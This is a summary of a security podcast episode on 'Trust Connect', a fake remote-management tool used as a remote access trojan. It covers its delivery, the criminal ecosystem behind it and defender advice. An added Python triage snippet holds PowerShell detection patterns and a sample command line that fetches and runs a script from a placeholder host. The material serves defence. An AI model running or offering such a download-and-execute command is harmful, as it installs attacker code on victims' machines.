CyberWire Daily – Research Saturday (April 11, 2026)
Episode: A wolf in admin clothing.
Overview
This Research Saturday edition examines a threat actor's use of fake remote monitoring and management (RMM) software, dubbed "Trust Connect," to conduct social engineering and deploy malware. Host Dave Bittner interviews Selina Larson, threat researcher from Proofpoint, about their report “Don’t Trust Connect. It’s a RAT in an RMM hat.” The discussion covers the technical and psychological tactics used to compromise organizations, the ecosystem of RMM abuse, indicators of compromise, AI’s role, and lessons for defenders.
Key Discussion Points and Insights
1. What is 'Trust Connect'?
- Fake RMM as Malware:
- "Ultimately what we identified was it's this fake RMM. It's a malware remote access trojan that's masquerading as a remote monitoring and management tool." – Selina Larson [01:24]
- Legitimate Facade: Website appears authentic with customer testimonials, branding, and even an extended validation certificate, yet serves malware.
- Vibe-coded, AI-generated Design:
- The website is likely AI-generated—“totally vibe coded”—and aims to appear trustworthy but demonstrates superficial, rather than deep, web security expertise. [01:24–03:50]
- Security Flaws: Exposed code and lack of proper access controls revealed more than intended:
- "It turns out you might be a good malware developer, but a terrible web developer. Different skillset. AI doesn’t immediately make you great at everything." – Selina Larson [04:47]
2. How Does the Infection Chain Work?
- Email-Based Delivery:
- "This tool [malware] being delivered via email... campaigns delivering multiple different RMMs alongside Trust Connect..." [05:09]
- Common Lures:
- Email subjects reference documents, party invites, Teams messages, or even Social Security information to lower suspicion.
- Download & Execution:
- Victims are encouraged to download and run an executable they believe is a legitimate RMM; it is actually a remote access trojan (RAT). [06:34]
- Post-Infection:
- Allows data theft, account takeover, further malware installation, and lateral movement within a network. [06:38]
3. The Wider Ecosystem of RMM Abuse
- Blending Malicious and Legitimate Tools:
- Threat actors often use actual RMM tools maliciously because they're readily accepted in workplace environments and rarely on blocklists. [07:21]
- Tool Chaining and Evolutions:
- Sometimes campaigns begin with legitimate RMMs (e.g., ScreenConnect, Datto, LogMeIn) and then expose users to Trust Connect.
- Extended Validation certificates add a false sense of legitimacy.
4. Professionalism and Functionality of Trust Connect's Panel
- Slick User Experience:
- Despite security flaws, the malware panel is well-designed, complete with support info and installation guides. [10:09]
- Deployment Guides:
- Step-by-step instructions for actors, including PowerShell scripts for easy deployment (ClickFix-style installs), Telegram bot setup for credential exfiltration, and flashy lures (Zoom, Adobe, Teams, SSA exe).
- Malware-as-a-Service Model:
- Operators license the malware to others, who conduct their own campaigns.
5. Attribution and Ties to Larger Criminal Ecosystems
- Redline Stealer Connection:
- The required point of contact, “Zaki09” on Telegram, matches a VIP customer identified in Operation Magnus, a law enforcement initiative targeting Redline users.
- "We did have some fun kind of running that down." – Selina Larson [14:07]
- Adaptability:
- After interventions (EV certificate revocation, domain takedown), the group pivoted quickly, releasing variants (like Dot Connect) with similar capabilities. [14:41]
6. Defensive Recommendations
- Indicators and Signatures Shared:
- Proofpoint contributed to the development of detection rules (Emerging Threats, ET Open signatures) for defenders. [16:15]
- Behavioral Defense Focus:
- Emphasize blocking or closely monitoring:
- Unusual executables and PowerShell usage
- Unapproved RMM domains and installs
- Social engineering techniques (e.g., realistic-looking lures, faked legitimacy)
- Lesson:
- Defenders should focus as much on the behaviors and techniques as on specific malware signatures.
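As an added example (not the episode's or Proofpoint's code), a small allowlist-based triage over constructed endpoint events in the spirit of the recommendations above: it flags RMM installers that are not on an approved list and PowerShell launches that combine several paste-and-run traits. The event shape, the approved-RMM policy, the process names and the domains are all assumptions.

```python
import re

# Assumed organizational policy (not from the episode): the only RMM approved here.
APPROVED_RMM = {"screenconnect"}
# RMM product names the episode mentions, plus "connect" to catch the fake
# "Trust Connect" / "Dot Connect" installers; all matched case-insensitively.
RMM_KEYWORDS = ("screenconnect", "datto", "logmein", "connect")
# Command-line traits typical of paste-and-run ("ClickFix"-style) PowerShell.
PS_INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote fetch": re.compile(r"\b(?:irm|iwr|invoke-(?:restmethod|webrequest)|downloadstring)\b", re.I),
    "in-memory exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}
PS_THRESHOLD = 2  # two or more traits together is rare in routine admin scripting

def classify(event):
    """Return a review reason for one (user, process, cmdline, domain) event, or None."""
    _user, process, cmdline, domain = event
    name = process.lower()
    if name in ("powershell.exe", "pwsh.exe"):
        hits = [k for k, rx in PS_INDICATORS.items() if rx.search(cmdline)]
        return f"suspicious PowerShell ({', '.join(hits)})" if len(hits) >= PS_THRESHOLD else None
    if any(k in name for k in RMM_KEYWORDS):
        if any(a in name for a in APPROVED_RMM):
            return None  # a sanctioned RMM is worth inventorying, but is not an alert
        return f"unapproved RMM install: {process} -> {domain or 'n/a'}"
    return None

def triage(events):
    """Run classify() over a batch; return [(user, process, reason), ...] for flagged events."""
    return [(ev[0], ev[1], classify(ev)) for ev in events if classify(ev)]

# Constructed sample telemetry (user, process, command line, destination domain); not real data.
SAMPLE_EVENTS = [
    ("alice", "ScreenConnect.ClientSetup.exe", "ScreenConnect.ClientSetup.exe", "relay.msp.example"),
    ("bob", "TrustConnect_Setup.exe", "TrustConnect_Setup.exe /S", "trust-connect.example"),
    ("carol", "powershell.exe",
     'powershell -w hidden -ep bypass -c "irm https://cdn.example/x.ps1 | iex"', "cdn.example"),
    ("dave", "powershell.exe", r"powershell -File C:\scripts\inventory.ps1", ""),
    ("erin", "Datto.Agent.Installer.exe", "Datto.Agent.Installer.exe", "agent.datto.example"),
]

if __name__ == "__main__":
    for user, process, reason in triage(SAMPLE_EVENTS):
        print(f"{user:6} {process:30} {reason}")
```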
7. AI’s Role in Social Engineering
- AI Ups the Authenticity Game:
- "I think one of the big ways that threat actors are using AI is to just make their stuff, whatever it is, look more authentic." [18:41]
- AI-Generated Artifacts Have Tells:
- Common patterns: excessive emoji use, similar site layouts (blue/purple, centered elements, rocket ship emoji).
- Limitations of AI-generated Malware:
- Functionality often still lags behind appearance; superficial flaws can expose attackers.
- "If you don’t have a base knowledge or understanding of something that you’re trying to do, it can actually be a vulnerability because you don’t know how to check if something’s secure or not." [19:32]
- Analogy:
- "When your kid's coming up, you give them a hammer and some nails... you don't start them out with a pneumatic nail gun." – Dave Bittner [21:21]
Notable Quotes & Memorable Moments
- "Trust us, it's real. We promise." (sarcastically about the site's name) – Selina Larson [02:18]
- "Turns out you might be a good malware developer, but a terrible web developer. Different skillset. AI doesn’t immediately make you great at everything." – Selina Larson [04:47]
- "Defending against the behaviors is something that can be very, very important." – Selina Larson [16:38]
- "I think of AI as just, it's a word processor for, you know, tooling... If you don't have a base knowledge or understanding, it can actually be a vulnerability..." – Selina Larson [19:32]
- "It makes me think about how... you give [kids] a hammer and some nails... but you don't start them out with a pneumatic nail gun." – Dave Bittner [21:21]
Important Timestamps (MM:SS)
- [01:24] — Intro to Trust Connect and tactic overview
- [05:09] — Walkthrough of infection chain
- [07:21] — Ecosystem of RMM abuse and why it’s effective
- [10:09] — Professionalism and structure of the malware’s user panel
- [12:27] — Attribution and Redline stealer connections
- [14:41] — Group’s ability to pivot after disruptions
- [16:15] — Defensive recommendations for organizations
- [18:41] — AI's role in social engineering and design
- [21:21] — Analogy about skilled threat use of AI and vulnerabilities
Conclusion / Takeaways
- "Trust Connect" demonstrates the increasing sophistication—yet sometimes surface-level—of AI-assisted phishing and malware campaigns.
- Social engineering is enhanced by convincingly legitimate web design, certificates, and deployment instructions, but real expertise still matters.
- Defenders must focus on behavioral indicators and known TTPs, not just static malware signatures.
- AI contributes to rapid development and better-looking campaigns, but also introduces new, exploitable errors for skilled analysts.
- The threat landscape is evolving quickly, with malware-as-a-service and adaptive, professional actors making incident response increasingly complex.
Recommended for further reading: See Proofpoint’s report “Don’t Trust Connect. It’s a RAT in an RMM hat” for technical details and indicators of compromise.
Featured Guest: Selina Larson, Threat Researcher, Proofpoint
Host: Dave Bittner, CyberWire/N2K Networks